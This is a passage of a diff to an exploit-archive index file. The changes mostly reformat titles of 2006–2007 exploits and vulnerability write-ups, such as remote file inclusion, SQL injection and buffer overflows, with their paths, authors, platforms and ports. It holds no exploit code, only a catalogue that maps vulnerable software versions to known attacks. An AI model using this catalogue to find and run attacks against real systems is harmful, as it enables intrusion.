melissa (Snort Frontend) Remote Inclusion Vulnerabilities",2006-05-25,str0ke,php,webapps,0 +1823,platforms/php/webapps/1823.txt,"BASE <= 1.2.4 - melissa (Snort Frontend) Remote Inclusion Vulnerabilities",2006-05-25,str0ke,php,webapps,0 1824,platforms/php/webapps/1824.txt,"open-medium.CMS <= 0.25 (404.php) Remote File Include Vulnerability",2006-05-25,Kacper,php,webapps,0 1825,platforms/php/webapps/1825.txt,"Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability",2006-05-25,Kacper,php,webapps,0 1826,platforms/php/webapps/1826.txt,"Socketmail <= 2.2.6 (site_path) Remote File Include Vulnerability",2006-05-25,Aesthetico,php,webapps,0 @@ -1546,7 +1546,7 @@ id,file,description,date,author,platform,type,port 1835,platforms/php/webapps/1835.txt,"Hot Open Tickets <= 11012004 - (CLASS_PATH) Remote Include Vulnerability",2006-05-27,Kacper,php,webapps,0 1836,platforms/asp/webapps/1836.txt,"PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability",2006-05-27,ajann,asp,webapps,0 1837,platforms/asp/webapps/1837.pl,"MiniNuke 2.x - (create an admin) Remote SQL Injection Exploit",2006-05-27,nukedx,asp,webapps,0 -1838,platforms/windows/dos/1838.html,"Microsoft Internet Explorer (HTML Tag) Memory Corruption (MS06-013)",2006-05-27,"Thomas Waldegger",windows,dos,0 +1838,platforms/windows/dos/1838.html,"Microsoft Internet Explorer - (HTML Tag) Memory Corruption (MS06-013)",2006-05-27,"Thomas Waldegger",windows,dos,0 1839,platforms/php/webapps/1839.txt,"tinyBB <= 0.3 - Remote (Include / SQL Injection) Vulnerabilities",2006-05-28,nukedx,php,webapps,0 1840,platforms/asp/webapps/1840.txt,"Enigma Haber <= 4.3 - Multiple Remote SQL Injection Vulnerabilities",2006-05-28,nukedx,asp,webapps,0 1841,platforms/php/webapps/1841.txt,"F@cile Interactive Web <= 0.8x Remote (Include / XSS) Vulnerabilities",2006-05-28,nukedx,php,webapps,0 @@ -1778,7 +1778,7 @@ id,file,description,date,author,platform,type,port 2077,platforms/php/webapps/2077.txt,"WMNews <= 0.2a (base_datapath) Remote Inclusion Vulnerability",2006-07-27,uNfz,php,webapps,0 2078,platforms/php/webapps/2078.txt,"a6mambohelpdesk Mambo Component <= 18RC1 Include Vulnerability",2006-07-27,Dr.Jr7,php,webapps,0 2079,platforms/windows/remote/2079.pl,"eIQnetworks ESA (Syslog Server) Remote Buffer Overflow Exploit",2006-07-27,"Kevin Finisterre",windows,remote,12345 -2080,platforms/windows/remote/2080.pl,"eIQnetworks License Manager Remote Buffer Overflow Exploit (multi)",2006-07-27,"Kevin Finisterre",windows,remote,10616 +2080,platforms/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (multi) (1)",2006-07-27,"Kevin Finisterre",windows,remote,10616 2081,platforms/php/webapps/2081.txt,"Portail PHP <= 1.7 (chemin) Remote Inclusion Vulnerability",2006-07-27,"Mehmet Ince",php,webapps,0 2082,platforms/multiple/remote/2082.html,"Mozilla Firefox <= 1.5.0.4 - Javascript Navigator Object Code Execution PoC",2006-07-28,"H D Moore",multiple,remote,0 2083,platforms/php/webapps/2083.txt,"Mambo Security Images Component <= 3.0.5 Inclusion Vulnerabilities",2006-07-28,Drago84,php,webapps,0 @@ -1835,7 +1835,7 @@ id,file,description,date,author,platform,type,port 2137,platforms/php/webapps/2137.txt,"QuestCMS (main.php) Remote File Include Vulnerability",2006-08-07,Crackers_Child,php,webapps,0 2138,platforms/asp/webapps/2138.txt,"YenerTurk Haber Script 1.0 - Remote SQL Injection Vulnerability",2006-08-07,ASIANEAGLE,asp,webapps,0 2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet <= 0.5 (Core.php) Remote File Include Vulnerability",2006-08-07,Minion,php,webapps,0 -2140,platforms/windows/remote/2140.pm,"eIQnetworks License Manager Remote Buffer Overflow Exploit (multi)",2006-08-07,ri0t,windows,remote,10616 +2140,platforms/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (multi) (2)",2006-08-07,ri0t,windows,remote,10616 2141,platforms/php/webapps/2141.txt,"Visual Events Calendar 1.1 (cfg_dir) Remote Include Vulnerability",2006-08-07,"Mehmet Ince",php,webapps,0 2142,platforms/php/webapps/2142.txt,"ZoneX 1.0.3 Publishers Gold Edition Remote File Inclusion Vulnerability",2006-08-07,"Mehmet Ince",php,webapps,0 2143,platforms/php/webapps/2143.pl,"TWiki <= 4.0.4 (configure) Remote Command Execution Exploit",2006-08-07,"Javier Olascoaga",php,webapps,0 @@ -1928,7 +1928,7 @@ id,file,description,date,author,platform,type,port 2231,platforms/php/webapps/2231.php,"Simple Machines Forum <= 1.1 rc2 (lngfile) Remote Exploit (windows)",2006-08-20,rgod,php,webapps,0 2232,platforms/php/webapps/2232.pl,"SimpleBlog <= 2.0 (comments.asp) Remote SQL Injection Exploit",2006-08-20,ASIANEAGLE,php,webapps,0 2233,platforms/windows/remote/2233.c,"WFTPD 3.23 (SIZE) Remote Buffer Overflow Exploit",2006-08-21,h07,windows,remote,21 -2234,platforms/windows/remote/2234.py,"Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (PoC)",2006-08-21,h07,windows,remote,21 +2234,platforms/windows/remote/2234.py,"Easy File Sharing FTP Server 2.0 - (PASS) Remote Exploit (PoC)",2006-08-21,h07,windows,remote,21 2235,platforms/php/webapps/2235.txt,"PHProjekt <= 6.1 (path_pre) Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0 2236,platforms/php/webapps/2236.txt,"PHlyMail Lite <= 3.4.4 (folderprops.php) Remote Include Vulnerability (2)",2006-08-21,Kw3[R]Ln,php,webapps,0 2237,platforms/multiple/dos/2237.sh,"Apache < 1.3.37 / 2.0.59 / 2.2.3 - (mod_rewrite) Remote Overflow PoC",2006-08-21,"Jacobo Avariento",multiple,dos,0 @@ -1972,7 +1972,7 @@ id,file,description,date,author,platform,type,port 2275,platforms/php/webapps/2275.txt,"phpECard <= 2.1.4 (functions.php) Remote File Include Vulnerability",2006-08-29,LeAk,php,webapps,0 2276,platforms/windows/remote/2276.pm,"IBM eGatherer <= 3.20.0284.0 (ActiveX) Remote Code Execution Exploit",2006-08-29,"Francisco Amato",windows,remote,0 2277,platforms/windows/remote/2277.c,"Streamripper <= 1.61.25 - HTTP Header Parsing Buffer Overflow Exploit (2)",2006-08-29,psylocn,windows,remote,0 -2278,platforms/windows/local/2278.cpp,"ZipCentral 4.01 ZIP File Handling Local Buffer Overflow Exploit",2006-08-30,bratax,windows,local,0 +2278,platforms/windows/local/2278.cpp,"ZipCentral 4.01 - ZIP File Handling Local Buffer Overflow Exploit",2006-08-30,bratax,windows,local,0 2279,platforms/php/webapps/2279.txt,"phpAtm <= 1.21 (include_location) Remote File Include Vulnerabilities",2006-08-30,KinSize,php,webapps,0 2280,platforms/php/webapps/2280.pl,"Lanifex DMO <= 2.3b (_incMgr) Remote File Include Exploit",2006-08-30,Kacper,php,webapps,0 2281,platforms/php/webapps/2281.pl,"Pheap CMS <= 1.1 (lpref) Remote File Include Exploit",2006-08-31,Kacper,php,webapps,0 @@ -2024,7 +2024,7 @@ id,file,description,date,author,platform,type,port 2327,platforms/php/webapps/2327.txt,"PhotoKorn Gallery <= 1.52 (dir_path) Remote File Include Vulnerabilities",2006-09-07,"Saudi Hackrz",php,webapps,0 2328,platforms/windows/remote/2328.php,"RaidenHTTPD 1.1.49 - (SoftParserFileXml) Remote Code Execution Exploit",2006-09-08,rgod,windows,remote,80 2329,platforms/php/webapps/2329.txt,"Somery <= 0.4.6 (skin_dir) Remote File Include Vulnerability",2006-09-08,basher13,php,webapps,0 -2330,platforms/solaris/local/2330.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/sparc)",2006-09-08,"RISE Security",solaris,local,0 +2330,platforms/solaris/local/2330.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/sparc) (1)",2006-09-08,"RISE Security",solaris,local,0 2331,platforms/solaris/local/2331.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/x86)",2006-09-08,"RISE Security",solaris,local,0 2332,platforms/sco/local/2332.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (sco/x86)",2006-09-08,"RISE Security",sco,local,0 2333,platforms/php/webapps/2333.php,"CCleague Pro <= 1.0.1RC1 (Cookie) Remote Code Execution Exploit",2006-09-08,Kacper,php,webapps,0 @@ -2054,7 +2054,7 @@ id,file,description,date,author,platform,type,port 2357,platforms/php/webapps/2357.txt,"phpunity.postcard (gallery_path) Remote File Include Vulnerability",2006-09-13,Rivertam,php,webapps,0 2358,platforms/windows/remote/2358.c,"Microsoft Internet Explorer COM Object Remote Heap Overflow Exploit",2006-09-13,nop,windows,remote,0 2359,platforms/php/webapps/2359.txt,"Downstat <= 1.8 (art) Remote File Include Vulnerability",2006-09-13,SilenZ,php,webapps,0 -2360,platforms/solaris/local/2360.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/sparc)",2006-09-13,"Marco Ivaldi",solaris,local,0 +2360,platforms/solaris/local/2360.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/sparc) (2)",2006-09-13,"Marco Ivaldi",solaris,local,0 2361,platforms/php/webapps/2361.txt,"Shadowed Portal <= 5.599 (root) Remote File Include Vulnerability",2006-09-13,mad_hacker,php,webapps,0 2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 (icerikno) Remote SQL Injection Vulnerability",2006-09-13,RMx,asp,webapps,0 2363,platforms/php/webapps/2363.tt,"Magic News Pro <= 1.0.3 (script_path) Remote File Include Vulnerability",2006-09-13,"Saudi Hackrz",php,webapps,0 @@ -2175,7 +2175,7 @@ id,file,description,date,author,platform,type,port 2479,platforms/php/webapps/2479.txt,"PHP Classifieds 7.1 (index.php) Remote SQL Injection Vulnerability",2006-10-05,Kzar,php,webapps,0 2480,platforms/php/webapps/2480.txt,"phpBB Security Suite Mod 1.0.0 (logger_engine.php) Remote File Include",2006-10-05,SpiderZ,php,webapps,0 2481,platforms/php/webapps/2481.txt,"Dimension of phpBB <= 0.2.6 (phpbb_root_path) Remote File Includes",2006-10-05,SpiderZ,php,webapps,0 -2482,platforms/windows/remote/2482.pl,"SHTTPD 1.34 (POST) Remote Buffer Overflow Exploit",2006-10-05,SkOd,windows,remote,0 +2482,platforms/windows/remote/2482.pl,"SHTTPD 1.34 - (POST) Remote Buffer Overflow Exploit",2006-10-05,SkOd,windows,remote,0 2483,platforms/php/webapps/2483.txt,"phpBB User Viewed Posts Tracker <= 1.0 File Include Vulnerability",2006-10-06,"Mehmet Ince",php,webapps,0 2484,platforms/php/webapps/2484.txt,"FreeForum <= 0.9.7 (forum.php) Remote File Include Vulnerability",2006-10-07,"Mehmet Ince",php,webapps,0 2485,platforms/php/webapps/2485.pl,"Cahier de texte 2.0 (lire.php) Remote SQL Injection Exploit",2006-10-07,s4mi,php,webapps,0 @@ -2495,7 +2495,7 @@ id,file,description,date,author,platform,type,port 2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader <= 1.5 (save.php) Remote Code Execution Exploit",2006-11-18,nuffsaid,php,webapps,0 2813,platforms/asp/webapps/2813.txt,"ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability",2006-11-19,ajann,asp,webapps,0 2814,platforms/php/webapps/2814.txt,"PHPQuickGallery <= 1.9 (textFile) Remote File Include Vulnerability",2006-11-19,"Al7ejaz Hacker",php,webapps,0 -2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 (M3U Filename) Local Buffer Overflow Exploit",2006-11-20,"Greg Linares",windows,local,0 +2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - (M3U Filename) Local Buffer Overflow Exploit",2006-11-20,"Greg Linares",windows,local,0 2817,platforms/php/webapps/2817.txt,"Photo Cart 3.9 (adminprint.php) Remote File Include Vulnerability",2006-11-21,irvian,php,webapps,0 2818,platforms/php/webapps/2818.txt,"e-Ark 1.0 (src/ark_inc.php) Remote File Include Vulnerability",2006-11-21,DeltahackingTEAM,php,webapps,0 2819,platforms/php/webapps/2819.txt,"LDU <= 8.x - (avatarselect id) Remote SQL Injection Vulnerability",2006-11-21,nukedx,php,webapps,0 @@ -2555,7 +2555,7 @@ id,file,description,date,author,platform,type,port 2877,platforms/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection Vulnerability",2006-12-01,N/A,php,webapps,0 2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - (admin/FileServer.php) File Disclosure Vulnerability",2006-12-01,qobaiashi,php,webapps,0 2879,platforms/windows/dos/2879.py,"Microsoft Windows spoolss GetPrinterData() Remote DoS Exploit (0day)",2006-12-01,h07,windows,dos,0 -2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player <= 2.1 Malformed PLF Buffer Overflow PoC",2006-12-01,"Greg Linares",windows,local,0 +2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player <= 2.1 - Malformed PLF Buffer Overflow PoC",2006-12-01,"Greg Linares",windows,local,0 2881,platforms/asp/webapps/2881.txt,"Ultimate HelpDesk - (XSS/Local File Disclosure) Vulnerabilities",2006-12-01,ajann,asp,webapps,0 2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional - (Path Disclosure/Include) Multiple Vulnerabilities",2006-12-02,y3dips,php,webapps,0 2883,platforms/php/webapps/2883.txt,"simple file manager 0.24a - Multiple Vulnerabilities",2006-12-02,flame,php,webapps,0 @@ -2799,18 +2799,18 @@ id,file,description,date,author,platform,type,port 3124,platforms/php/webapps/3124.php,"ThWboard <= 3.0b2.84-php5 SQL Injection / Code Execution Exploit",2007-01-14,rgod,php,webapps,0 3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - (download.php) Remote File Disclosure Exploit",2007-01-14,PeTrO,php,webapps,0 3126,platforms/windows/dos/3126.c,"WFTPD Pro Server <= 3.25 SITE ADMN Remote Denial of Service Exploit",2007-01-14,Marsu,windows,dos,0 -3127,platforms/windows/dos/3127.c,"Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow PoC",2007-01-14,Marsu,windows,dos,0 +3127,platforms/windows/dos/3127.c,"Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow PoC",2007-01-14,Marsu,windows,dos,0 3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP (USER) Remote Buffer Overflow PoC",2007-01-14,Marsu,windows,dos,0 3130,platforms/osx/dos/3130.c,"Mac OS X 10.4.8 AppleTalk ATPsndrsp() Heap Buffer Overflow PoC",2007-01-14,MoAB,osx,dos,0 3131,platforms/windows/local/3131.c,"Kaspersky Antivirus 6.0 - Local Privilege Escalation Exploit",2007-01-15,MaD,windows,local,0 3132,platforms/windows/remote/3132.pl,"TFTPDWIN 0.4.2 - Remote Buffer Overflow Exploit",2007-01-15,"Jacopo Cervini",windows,remote,69 -3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit",2007-01-15,"Jacopo Cervini",windows,remote,143 +3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 - IMAP Remote Buffer Overflow Exploit",2007-01-15,"Jacopo Cervini",windows,remote,143 3134,platforms/php/webapps/3134.php,"KGB <= 1.9 (sesskglogadmin.php) Local File Include Exploit",2007-01-15,Kacper,php,webapps,0 3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - Remote SQL Injection Vulnerability",2007-01-15,"ilker Kandemir",asp,webapps,0 3137,platforms/windows/remote/3137.html,"Microsoft Internet Explorer - VML Remote Buffer Overflow Exploit (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0 3138,platforms/windows/dos/3138.pl,"Twilight Webserver 1.3.3.0 (GET) Remote Denial of Service Exploit",2003-07-07,N/A,windows,dos,0 3139,platforms/osx/dos/3139.rb,"Colloquy <= 2.1.3545 (INVITE) Format String Denial of Service Exploit",2007-01-17,MoAB,osx,dos,0 -3140,platforms/windows/remote/3140.pl,"Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit",2007-01-17,UmZ,windows,remote,21 +3140,platforms/windows/remote/3140.pl,"Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow Exploit",2007-01-17,UmZ,windows,remote,21 3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 (email.php id variable) Remote SQL Injection Exploit",2007-01-17,SlimTim10,php,webapps,0 3142,platforms/windows/dos/3142.html,"CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service Exploit",2007-01-17,shinnai,windows,dos,0 3143,platforms/php/webapps/3143.php,"Woltlab Burning Board <= 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (1)",2007-01-17,"silent vapor",php,webapps,0 @@ -2852,7 +2852,7 @@ id,file,description,date,author,platform,type,port 3179,platforms/multiple/local/3179.txt,"Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit",2007-01-23,"Joxean Koret",multiple,local,0 3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 (poll_frame.php poll_id) Remote Code Execution Exploit",2007-01-23,r0ut3r,php,webapps,0 3181,platforms/osx/local/3181.rb,"Mac OS X 10.4.8 - (UserNotificationCenter) Privilege Escalation Exploit",2007-01-23,MoAB,osx,local,0 -3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 (HTTP 404 - Object not found) DoS Exploit",2007-01-23,shinnai,windows,dos,0 +3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - (HTTP 404 - Object not found) DoS Exploit",2007-01-23,shinnai,windows,dos,0 3183,platforms/php/webapps/3183.txt,"BBClone 0.31 (selectlang.php) Remote File Inclusion Vulnerability",2007-01-23,3l3ctric-Cracker,php,webapps,0 3184,platforms/php/webapps/3184.txt,"phpXD <= 0.3 (path) Remote File Inclusion Vulnerability",2007-01-23,3l3ctric-Cracker,php,webapps,0 3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 (config.php sql_language) Remote File Inclusion Vulnerability",2007-01-24,3l3ctric-Cracker,php,webapps,0 @@ -2971,11 +2971,11 @@ id,file,description,date,author,platform,type,port 3300,platforms/php/webapps/3300.pl,"Advanced Poll <= 2.0.5-dev Remote Code Execution Exploit",2007-02-13,diwou,php,webapps,0 3301,platforms/asp/webapps/3301.txt,"PollMentor 2.0 (pollmentorres.asp id) SQL Injection Vulnerability",2007-02-13,SaO,asp,webapps,0 3302,platforms/windows/remote/3302.sh,"Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit",2007-02-13,"Marco Ivaldi",windows,remote,80 -3303,platforms/multiple/remote/3303.sh,"Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit",2007-02-13,"Marco Ivaldi",multiple,remote,0 +3303,platforms/multiple/remote/3303.sh,"Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE - Timing Attack Exploit",2007-02-13,"Marco Ivaldi",multiple,remote,0 3304,platforms/windows/dos/3304.py,"MiniWebsvr <= 0.0.6 - Remote Resource Consumption DoS Exploit",2007-02-13,shinnai,windows,dos,0 3305,platforms/php/webapps/3305.txt,"nabopoll 1.2 - Remote Unprotected Admin Section Vulnerability",2007-02-13,sn0oPy,php,webapps,0 3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise <= 2.35 Out of Bounds DoS Exploit",2007-02-14,mu-b,windows,dos,0 -3307,platforms/windows/dos/3307.html,"ActSoft DVD-Tools (dvdtools.ocx) Remote Buffer Overflow Exploit PoC",2007-02-14,shinnai,windows,dos,0 +3307,platforms/windows/dos/3307.html,"ActSoft DVD-Tools - (dvdtools.ocx) Remote Buffer Overflow Exploit PoC",2007-02-14,shinnai,windows,dos,0 3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise <= 2.37 - Denial of Service Exploit",2007-02-14,mu-b,windows,dos,0 3309,platforms/php/webapps/3309.txt,"Jupiter CMS 1.1.5 (index.php) Local/Remote File Include Vulnerability",2007-02-14,DarkFig,php,webapps,0 3310,platforms/php/webapps/3310.php,"Jupiter CMS 1.1.5 (Client-IP) Remote SQL Injection Exploit",2007-02-14,DarkFig,php,webapps,0 @@ -3051,10 +3051,10 @@ id,file,description,date,author,platform,type,port 3382,platforms/php/webapps/3382.txt,"Admin Phorum 3.3.1a - (del.php include_path) RFI Vulnerability",2007-02-27,GoLd_M,php,webapps,0 3383,platforms/plan9/local/3383.c,"Plan 9 Kernel - (devenv.c OTRUNC/pwrite) Local Exploit",2007-02-28,"Don Bailey",plan9,local,0 3384,platforms/linux/local/3384.c,"Apache 1.3.33/1.3.34 (Ubuntu / Debian) - (CGI TTY) Local Root Exploit",2007-02-28,"Kristian Hermansen",linux,local,0 -3385,platforms/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 (ABOR) Format String DoS Exploit",2007-02-28,"Umesh Wanve",windows,dos,0 +3385,platforms/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 - (ABOR) Format String DoS Exploit",2007-02-28,"Umesh Wanve",windows,dos,0 3386,platforms/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) <= 7.7 - Local Root Exploit",2007-02-28,"Kevin Finisterre",osx,local,0 3387,platforms/php/webapps/3387.php,"vBulletin <= 3.6.4 (inlinemod.php postids) Remote SQL Injection Exploit",2007-02-28,rgod,php,webapps,0 -3388,platforms/windows/remote/3388.pl,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Exploit (perl)",2007-02-28,"Umesh Wanve",windows,remote,69 +3388,platforms/windows/remote/3388.pl,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Exploit (Perl)",2007-02-28,"Umesh Wanve",windows,remote,69 3389,platforms/linux/remote/3389.c,"madwifi <= 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow Exploit",2007-03-01,"Massimiliano Oldani",linux,remote,0 3390,platforms/asp/webapps/3390.txt,"Angel Lms 7.1 (default.asp id) Remote SQL Injection Vulnerability",2007-03-01,"Craig Heffner",asp,webapps,0 3391,platforms/windows/remote/3391.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit",2007-03-01,"Trirat Puttaraksa",windows,remote,0 @@ -3231,7 +3231,7 @@ id,file,description,date,author,platform,type,port 3567,platforms/php/webapps/3567.pl,"Mambo Module Flatmenu <= 1.07 - Remote File Include Exploit",2007-03-25,"Cold Zero",php,webapps,0 3568,platforms/php/webapps/3568.txt,"Free Image Hosting <= 2.0 (AD_BODY_TEMP) Remote File Inclusion Vulnerabilities",2007-03-25,Crackers_Child,php,webapps,0 3569,platforms/php/webapps/3569.pl,"PBlang <= 4.66z Remote Create Admin Exploit",2007-03-25,Hessam-x,php,webapps,0 -3570,platforms/windows/remote/3570.c,"WarFTP 1.65 (USER) Remote Buffer Overlow Exploit",2007-03-25,niXel,windows,remote,21 +3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overlow Exploit",2007-03-25,niXel,windows,remote,21 3571,platforms/linux/local/3571.php,"PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 3572,platforms/linux/local/3572.php,"PHP < 4.4.5 / 5.2.1 _SESSION Deserialization Overwrite Exploit",2007-03-25,"Stefan Esser",linux,local,0 3574,platforms/php/webapps/3574.pl,"PBlang 4.66z Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0 @@ -3270,7 +3270,7 @@ id,file,description,date,author,platform,type,port 3607,platforms/php/webapps/3607.txt,"Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities",2007-03-29,"ThE dE@Th",php,webapps,0 3608,platforms/php/webapps/3608.txt,"Advanced Login <= 0.7 (root) Remote File Inclusion Vulnerability",2007-03-29,Bithedz,php,webapps,0 3609,platforms/linux/remote/3609.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)",2007-03-30,"Winny Thomas",linux,remote,0 -3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools (dvdtools.ocx) Remote Buffer Overflow Exploit",2007-03-30,"Umesh Wanve",windows,remote,0 +3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - (dvdtools.ocx) Remote Buffer Overflow Exploit",2007-03-30,"Umesh Wanve",windows,remote,0 3611,platforms/php/webapps/3611.txt,"JC URLshrink 1.3.1 - Remote Code Execution Vulnerability",2007-03-30,Dj7xpl,php,webapps,0 3612,platforms/php/webapps/3612.pl,"XOOPS Module Repository (viewcat.php) Remote SQL Injection Exploit",2007-03-30,ajann,php,webapps,0 3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 - RFI Vulnerability",2007-03-30,bd0rk,php,webapps,0 @@ -3337,7 +3337,7 @@ id,file,description,date,author,platform,type,port 3677,platforms/php/webapps/3677.txt,"cattaDoc 2.21 (download2.php fn1) Remote File Disclosure Vulnerability",2007-04-06,GoLd_M,php,webapps,0 3678,platforms/php/webapps/3678.php,"SmodBIP <= 1.06 (aktualnosci zoom) Remote SQL Injection Exploit",2007-04-06,Kacper,php,webapps,0 3679,platforms/php/webapps/3679.php,"SmodCMS <= 2.10 (Slownik ssid) Remote SQL Injection Exploit",2007-04-06,Kacper,php,webapps,0 -3680,platforms/windows/remote/3680.sh,"Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (Win32)",2007-04-07,axis,windows,remote,80 +3680,platforms/windows/remote/3680.sh,"Apache Mod_Rewrite - Off-by-one Remote Overflow Exploit (Win32)",2007-04-07,axis,windows,remote,80 3681,platforms/php/webapps/3681.txt,"Scorp Book 1.0 (smilies.php config) Remote File Inclusion Vulnerability",2007-04-08,Dj7xpl,php,webapps,0 3683,platforms/php/webapps/3683.pl,"PHP-Nuke Module eBoard 1.0.7 - GLOBALS[name] LFI Exploit",2007-04-08,bd0rk,php,webapps,0 3684,platforms/windows/dos/3684.c,"Microsoft Windows - Explorer Unspecified .ANI File Denial of Service Exploit",2007-04-08,Marsu,windows,dos,0 @@ -3499,7 +3499,7 @@ id,file,description,date,author,platform,type,port 3841,platforms/php/webapps/3841.txt,"Pre News Manager 1.0 - Remote SQL Injection Vulnerability",2007-05-03,"Mehmet Ince",php,webapps,0 3842,platforms/php/webapps/3842.txt,"Pre Shopping Mall 1.0 - Remote SQL Injection Vulnerability",2007-05-03,"Mehmet Ince",php,webapps,0 3843,platforms/php/webapps/3843.txt,"Censura 1.15.04 - (censura.php vendorid) SQL Injection Vulnerability",2007-05-03,"Mehmet Ince",php,webapps,0 -3844,platforms/windows/remote/3844.html,"ActSoft DVD-Tools (dvdtools.ocx 3.8.5.0) Stack Overflow Exploit",2007-05-04,shinnai,windows,remote,0 +3844,platforms/windows/remote/3844.html,"ActSoft DVD-Tools - (dvdtools.ocx 3.8.5.0) Stack Overflow Exploit",2007-05-04,shinnai,windows,remote,0 3845,platforms/windows/dos/3845.html,"Office Viewer OCX 3.2.0.5 - Multiple Methods Denial of Service Exploit",2007-05-04,shinnai,windows,dos,0 3846,platforms/php/webapps/3846.txt,"E-GADS! 2.2.6 (common.php locale) Remote File Inclusion Vulnerability",2007-05-04,kezzap66345,php,webapps,0 3847,platforms/php/webapps/3847.txt,"Versado CMS 1.07 - (ajax_listado.php urlModulo) RFI Vulnerability",2007-05-04,kezzap66345,php,webapps,0 @@ -3566,7 +3566,7 @@ id,file,description,date,author,platform,type,port 3910,platforms/windows/dos/3910.html,"PrecisionID Barcode ActiveX 1.3 - Denial of Service Exploit",2007-05-12,shinnai,windows,dos,0 3911,platforms/php/webapps/3911.txt,"EfesTECH Haber 5.0 (id) Remote SQL Injection Vulnerability",2007-05-14,CyberGhost,php,webapps,0 3912,platforms/windows/local/3912.c,"notepad++ 4.1 ruby file processing Buffer Overflow Exploit (Win32)",2007-05-12,vade79,windows,local,0 -3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 (GET Request) Remote Buffer Overflow Exploit",2007-05-12,vade79,windows,remote,8080 +3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - (GET Request) Remote Buffer Overflow Exploit",2007-05-12,vade79,windows,remote,8080 3914,platforms/asp/webapps/3914.txt,"BlogMe 3.0 (archshow.asp var) Remote SQL Injection Vulnerability",2007-05-13,gsy,asp,webapps,0 3915,platforms/php/webapps/3915.txt,"CJG EXPLORER PRO 3.2 - (g_pcltar_lib_dir) RFI Vulnerabilities",2007-05-13,Mogatil,php,webapps,0 3916,platforms/windows/remote/3916.php,"VImpX - ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow Exploit",2007-05-13,rgod,windows,remote,0 @@ -3575,7 +3575,7 @@ id,file,description,date,author,platform,type,port 3919,platforms/php/webapps/3919.txt,"NagiosQL 2005 2.00 - (prepend_adm.php) Remote File Inclusion Vulnerability",2007-05-14,"ThE TiGeR",php,webapps,0 3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - (newsadmin.php action) RFI Vulnerability",2007-05-14,Mogatil,php,webapps,0 3921,platforms/windows/dos/3921.html,"Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow PoC",2007-05-14,shinnai,windows,dos,0 -3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 (GET Request) Remote Root Exploit (exec-shield)",2007-05-14,Xpl017Elz,linux,remote,8080 +3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - (GET Request) Remote Root Exploit (exec-shield)",2007-05-14,Xpl017Elz,linux,remote,8080 